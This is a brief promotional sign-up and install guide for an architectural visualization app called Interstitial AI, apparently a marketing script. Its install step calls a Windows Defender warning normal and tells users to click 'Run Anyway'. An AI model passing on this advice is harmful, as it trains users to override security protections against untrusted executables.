Become part of a new era of design. With Interstitial AI, architectural visualization is no longer a slow or complicated process. Developed by architects, for architects, our platform lets you create professional-grade visuals instantly. Getting started is simple. Head to interstitial-ai.com and click Sign In at the top. Select Sign Up, create your account, and verify it by email. Once logged in, choose a subscription plan to activate your account, then download the app from your dashboard or the landing page. During installation, Windows Defender may show a warning. That's normal, just click Run Anyway to continue. As more users install, the app will be fully recognized and verified. After installation, open the app, log in, and you're ready to create. Thank you for trying Interstitial AI. Welcome to the future of design.